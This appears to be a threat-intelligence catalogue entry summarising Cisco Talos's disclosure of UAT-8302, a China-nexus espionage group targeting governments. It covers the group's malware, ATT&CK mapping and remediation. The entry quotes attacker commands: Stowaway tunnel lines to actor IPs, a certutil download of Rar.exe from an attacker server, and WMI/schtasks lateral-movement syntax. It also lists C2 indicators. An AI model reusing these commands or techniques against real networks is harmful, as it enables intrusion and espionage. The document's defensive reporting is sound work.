UAT-8302 China-Nexus APT Campaign — NetDraft, CloudSorcerer v3, VSHELL/SNOWLIGHT, SNOWRUST, SNAPPYBEE/DeedRAT, ZingDoor, and Draculoader Targeting Government Entities in South America and Southeastern Europe
UAT-8302 China-Nexus APT Campaign (TL-2026-0462), also tracked as UAT-8302 Campaign, is a high-severity advanced persistent threat campaign, first published 2026-05-05. It is attributed to UAT-8302 (China) with high confidence, affects Microsoft Windows (endpoints, servers, domain controllers), maps to 40 MITRE ATT&CK techniques (T1003, T1005, T1014), and is covered by 9 detection rules and 67 indicators of compromise.
Key facts for TL-2026-0462
- Threat ID
- TL-2026-0462
- Also known as
- UAT-8302 Campaign
- Severity
- HIGH
- Status
- ACTIVE
- Category
- APT
- First published
- 2026-05-05
- Last reviewed
- 2026-05-05
- Attribution
- UAT-8302
- Attribution confidence
- HIGH
- Nation-state nexus
- China
- Motivation
- ESPIONAGE
- Target sectors
- government
- Target regions
- South America, Southeastern Europe
- Detection rules
- 9
- Indicators of compromise
- 67
Malware and tooling in UAT-8302 China-Nexus APT Campaign
Malware and tooling: CloudSorcerer v3, DracuLoader, FringePorch, NetDraft, SNAPPYBEE/DeedRAT, SNOWLIGHT, SNOWRUST, ZingDoor, AD Explorer (ae.exe), MobaXtermDecryptor, SoftEther VPN, Stowaway
Cisco Talos disclosed UAT-8302, a sophisticated China-nexus APT targeting government entities in South America since at least late 2024 and government agencies in southeastern Europe in 2025. The actor deploys a portfolio of custom-made malware shared with multiple known China-nexus clusters — NetDraft (a .NET FinalDraft/SquidDoor variant a.k.a. NosyDoor), CloudSorcerer v3, VSHELL with SNOWLIGHT stager and a new Rust-based SNOWRUST stager, SNAPPYBEE/DeedRAT, ZingDoor, and Draculoader — alongside open-source Chinese-language tooling (gogo, QScan, naabu, dddd, Stowaway, MobaXtermDecryptor, SharpGetUserLoginIPRP) for reconnaissance, credential extraction, lateral movement, and proxying.
How UAT-8302 China-Nexus APT Campaign works
On 5 May 2026, Cisco Talos researchers Jungsoo An, Asheer Malhotra, and Brandon White published a threat-spotlight disclosure of UAT-8302, a China-nexus advanced persistent threat actor primarily tasked with obtaining and maintaining long-term access to government and related entities worldwide. UAT-8302 has been targeting government entities in South America since at least late 2024 and expanded its targeting to government agencies in southeastern Europe in 2025. Talos assesses with high confidence that UAT-8302 is China-nexus based on heavy malware-portfolio overlap with multiple previously disclosed China-nexus clusters and the use of custom and open-source tooling written in Simplified Chinese.
Initial access methods are not directly observed in this campaign, but the actor's tooling overlaps with APT clusters known to exploit both zero-day and n-day vulnerabilities (e.g., UAT-6382's exploitation of Cityworks zero-day CVE-2025-0994 to deploy VSHELL via SNOWLIGHT). Once inside, UAT-8302 conducts extensive preliminary reconnaissance using Impacket, certutil, nslookup, net.exe, systeminfo, and ipconfig, then escalates to a custom-made PowerShell script ('whatpc.ps1') persisted via scheduled task (e.g., 'ReconLiteDebug', 'RunWhatPC') executing as SYSTEM. The script enumerates local groups and admin membership, network configuration, listening connections, SMB shares, AD users, computers, groups, and trust relationships via nltest, dsmod, and dsquery. Ping sweeps and SMB share-discovery loops over /24 subnets identify proliferation targets, and event logs (Security IDs such as 4768) are queried for administrator activity. Audit policy is enumerated via 'auditpol /get /category:*'. The actor downloads 'gogo' (a GoLang automated network scanner written in Simplified Chinese) directly from its GitHub release URL, alongside QScan, naabu, dddd, PortQry, and httpx.
UAT-8302 collects information using adconnectdump.py for Azure AD Connect / Entra ID Connect credential extraction, manual PowerShell Get-ADUser/Get-ADComputer/Get-ADGroup queries, AD Explorer snapshots packaged with 7zr.exe, and Get-WinEvent log harvests. A Chinese-language tool called 'SharpGetUserLoginIPRP' (deployed as C:\ProgramData\S.exe) extracts login information from domain controllers. MobaXterm credentials are stolen via MobaXtermDecryptor for SSH pivot.
Lateral movement is performed via Impacket and WMI remote process creation ('wmic /node:IP process call create', 'schtasks /S IP'), invoking BAT files that execute the malware on remote systems.
Custom malware deployment uses DLL side-loading triads: a benign signed executable, a malicious DLL loader, and an encoded data file. NetDraft (a .NET-based variant of FinalDraft/SquidDoor; ESET tracks the same family as 'NosyDoor' attributed to LongNosedGoblin; Solar reported NetDraft was used by Erudite Mogwai/LuckyStrike Agent against Russian IT in 2024) embeds a Fody/Costura-compressed .NET helper library Talos tracks as 'FringePorch'. NetDraft uses MS Graph API to communicate with its OneDrive-based C2 and can execute arbitrary commands, run .NET assemblies, perform file operations, and execute .NET plugins. Because NetDraft lacks native persistence, the C2 issues a scheduled-task creation command pointing to 'C:\ProgramData\Microsoft\Microsoft\Appunion.exe'.
CloudSorcerer v3 (an updated version of the malware Kaspersky disclosed in 2024 against Russian government) uses a side-loading triad with executables 'Yandex.exe' and 'VMtools.exe' loading 'mspdb60.dll', which decrypts an INI shellcode file ('test.ini' or 'VM.ini') and injects it into named processes. The shellcode behaves differently per host process: 'dpapimig.exe' gathers system info and listens on a named pipe for commands; 'spoolsv.exe' contacts a GitHub repository or GameSpot profile to obtain C2 information (URL, OneDrive/Dropbox token); 'mspaint.exe' or 'browser' triggers injection back into dpapimig.exe/spoolsv.exe.
VSHELL is delivered via a related triad in which a benign executable side-loads a malicious 'wininet.dll' that reads a BIN file and injects position-independent shellcode into 'explorer.exe'. The shellcode is the SNOWLIGHT stager, which downloads and single-byte XOR-decodes the next stage (key 0x99) — the same single-byte key and stager observed by Talos in UAT-6382's 2025 deliveries. UNC5174 has previously used SNOWLIGHT to download Sliver and VSHELL. UAT-8302 also uses 'SNOWRUST', a Rust-based variant of SNOWLIGHT built on the LexiCrypt Rust shellcode obfuscator that decodes embedded SNOWLIGHT shellcode to download the XOR-encoded VSHELL payload. In one intrusion, UAT-8302 used VSHELL to deploy the System Monitoring filter driver from the Hades open-source HIDS/HIPS framework (written in Simplified Chinese) to register kernel callbacks for process, thread, registry, and file events — enabling event hiding.
In one instance, UAT-8302 deployed SNAPPYBEE/DeedRAT and almost immediately switched to ZingDoor — a DLL-based malware first disclosed by Trend Micro in 2023 and attributed to Earth Estries. ZingDoor has also been observed after ToolShell exploitation in 2025. Draculoader, a generic shellcode loader used by Earth Estries and Earth Naga, was deployed in parallel from 'C:\Documents and Settings\All Users\Microsoft\Crypto\RSA\d3d8.dll'.
For backup access, UAT-8302 sets up Stowaway proxies (a Chinese-language tunneling tool — 'wagent.exe -c 85.209.156.3:56456', 'mmc.exe -l 85.209.156.3:56456 -s <pass>', 'ag531.exe -c 45.135.135.100:443'), anyproxy ('any.exe' in C:\users\public\), and SoftEther VPN clients ('Communicator.exe /usermode' from a Rar-archived bundle staged via certutil from hxxp://38.54.32.244/Rar.exe).
Malware overlap connects UAT-8302 to a web of China-nexus clusters: NetDraft/FinalDraft/Squidoor — Jewelbug/REF7707/CL-STA-0049/LongNosedGoblin; CloudSorcerer — original Kaspersky-disclosed actor; SNOWLIGHT/VSHELL — UAT-6382, UNC5174, UNC6586; SNAPPYBEE/ZingDoor — Earth Estries; Draculoader — Earth Estries and Earth Naga. NetDraft has additionally been observed in operations attributed to Erudite Mogwai (LuckyStrike Agent).
MITRE ATT&CK techniques used in TL-2026-0462
Credential Access
T1003 OS Credential Dumping; T1555 Credentials from Password Stores; T1558 Steal or Forge Kerberos Tickets
Collection
T1005 Data from Local System; T1560.001 Archive via Utility
Defense Evasion
T1014 Rootkit; T1027 Obfuscated Files or Information; T1055 Process Injection; T1140 Deobfuscate/Decode Files or Information
Discovery
T1016 System Network Configuration Discovery; T1018 Remote System Discovery; T1033 System Owner/User Discovery; T1046 Network Service Discovery; T1049 System Network Connections Discovery; T1069.002 Domain Groups; T1082 System Information Discovery; T1087.002 Domain Account; T1135 Network Share Discovery; T1482 Domain Trust Discovery
Lateral Movement
T1021.002 SMB/Windows Admin Shares; T1570 Lateral Tool Transfer
Exfiltration
T1041 Exfiltration Over C2 Channel; T1567.002 Exfiltration to Cloud Storage
Execution
T1047 Windows Management Instrumentation; T1053.005 Scheduled Task; T1059.001 PowerShell; T1059.003 Windows Command Shell; T1129 Shared Modules
Command and Control
T1071.001 Web Protocols; T1090 Proxy; T1102.001 Dead Drop Resolver; T1102.002 Bidirectional Communication; T1132.001 Standard Encoding; T1572 Protocol Tunneling
command-and-control
Initial Access
T1190 Exploit Public-Facing Application
execution
T1559 Inter-Process Communication
stealth
Resource Development
Affected products and versions in UAT-8302 China-Nexus APT Campaign
- Microsoft — Windows (endpoints, servers, domain controllers)
Vulnerable versions: all currently supported Windows builds in targeted environments - Microsoft — Active Directory / Azure AD Connect (Entra ID Connect)
Vulnerable versions: all - Mobatek — MobaXterm SSH client (credential store)
Vulnerable versions: all versions exposing local credential blob
Remediation for UAT-8302 China-Nexus APT Campaign
Patches
- Apply latest patches for any internet-facing applications used as initial access vectors by associated clusters (e.g., Cityworks CVE-2025-0994, Microsoft SharePoint ToolShell)
Immediate actions
- Block network IOCs (drivelivelime.com, msiidentity.com, trafficmanagerupdate.com, image.update-kaspersky.workers.dev, 85.209.156.3, 185.238.189.41, 103.27.108.55, 38.54.32.244, 45.140.168.62, 88.151.195.133, 156.238.224.82, 45.135.135.100) at perimeter and DNS layers
- Hunt for the listed file hashes across endpoint telemetry and quarantine matches
- Hunt for scheduled tasks named 'ReconLiteDebug', 'RunWhatPC', 'Runbat', and tasks executing files from C:\Windows\Temp\ or C:\ProgramData\Microsoft\Microsoft\
- Hunt for processes loading mspdb60.dll, wininet.dll side-loaded outside System32, and d3d8.dll under C:\Documents and Settings\All Users\Microsoft\Crypto\RSA\
- Hunt for unauthorized SoftEther 'Communicator.exe', Stowaway agents (wagent.exe, ag531.exe, any.exe), and certutil downloads of Rar.exe / portable archivers
Workarounds
- Disable PowerShell v2 and enforce ConstrainedLanguage where possible to break 'whatpc.ps1' and ad-hoc Get-AD* enumeration
- Disable WMI remote execution for unprivileged accounts and audit schtasks /S /U usage for lateral movement
Longer-term hardening
- Deploy EDR with behavioral detection for DLL side-loading from non-standard paths and process injection into explorer.exe / dpapimig.exe / spoolsv.exe
- Restrict outbound connections to legitimate cloud services (GitHub raw, OneDrive, Dropbox, GameSpot, Cloudflare workers.dev) for non-business endpoints — these are abused as C2 / dead-drop resolvers
- Network-segment domain controllers and audit Azure AD Connect / Entra ID Connect servers for unusual Python execution and adconnectdump-style activity
- Block or alert on use of MobaXterm credential stores from non-administrator workstations and limit interactive admin access to jump hosts
- Implement application allow-listing for /Windows/Temp, /ProgramData, /users/public, and /Documents and Settings/All Users/ prevent execution of dropper artifacts
Timeline of UAT-8302 China-Nexus APT Campaign
- Kaspersky discloses CloudSorcerer v2 backdoor used in attacks against Russian government entities — base for the v3 variant later deployed by UAT-8302.
- Solar reports NetDraft (FinalDraft .NET variant) deployed by Erudite Mogwai (LuckyStrike Agent) against Russian IT organizations in 2024.
- UAT-8302 begins targeting government entities in South America with NetDraft, CloudSorcerer v3, VSHELL, SNOWLIGHT, and supporting Chinese-language tooling (per Cisco Talos retrospective).
- UAT-6382 exploits Cityworks zero-day CVE-2025-0994 to deploy VSHELL via the SNOWLIGHT stager — same single-byte XOR (0x99) and stager later observed in UAT-8302's intrusions.
- UAT-8302 expands targeting to government agencies in southeastern Europe, deploying SNAPPYBEE/DeedRAT, ZingDoor, and Draculoader alongside the South-American toolset.
- ZingDoor observed deployed by China-nexus actors after successful exploitation of SharePoint ToolShell vulnerabilities, reinforcing the cluster overlap with Earth Estries.
- Cisco Talos publishes the UAT-8302 threat-spotlight blog (Jungsoo An, Asheer Malhotra, Brandon White) with full IOC set, ClamAV signatures, Snort rules, and cluster overlap mapping.
- As of 2026-05-29, UAT-8302 remains an active China-nexus government-espionage campaign, disclosed by Cisco Talos on 2026-05-05 and corroborated by Hacker News, SOC Prime and others with no takedown, arrest, or disruption reported. It has no CVEs of its own to patch, and its shared malware portfolio (NetDraft, CloudSorcerer v3, VSHELL/SNOWLIGHT, ZingDoor) ties to multiple still-active clusters.
Sources cited for UAT-8302 China-Nexus APT Campaign
- UAT-8302 and its box full of malware
- Cisco Talos UAT-8302 IOC repository (GitHub)
- ESET research on LongNosedGoblin / NosyDoor
- Solar 4RAYS reporting on Erudite Mogwai (LuckyStrike Agent) deployment of NetDraft against Russian IT organizations
- Kaspersky CloudSorcerer disclosure (Russian government targeting, 2024)
- Trend Micro Earth Estries (DeedRAT/SNAPPYBEE and ZingDoor)
- UAT-6382 Cityworks zero-day (CVE-2025-0994) exploitation deploying VSHELL via SNOWLIGHT (Cisco Talos)
- UNC5174 SNOWLIGHT / Sliver / VSHELL activity (Mandiant/Google TIG)
- ChainReactors gogo scanner (Simplified Chinese network scanner)
- Hades HIDS/HIPS open-source Windows host monitoring kernel framework (Simplified Chinese)
- Fody/Costura .NET embedding framework (used by NetDraft for FringePorch)
Threats related to UAT-8302 China-Nexus APT Campaign
- GRIDTIDE Backdoor — UNC2814 PRC-Nexus Global Espionage Campaign Targeting Telecoms & Governments via Google Sheets C2 (53 Victims, 42 Countries)
- SHADOW-EARTH-053 — China-Aligned Cyberespionage Campaign Exploiting Microsoft Exchange (ProxyLogon CVE-2021-26855/26857/26858/27065) and IIS to Deploy GODZILLA Web Shells and ShadowPad
Detection coverage for TL-2026-0462
As of 2026-05-05, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-0462 across Splunk SPL, Microsoft KQL and Sigma, covering 67 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.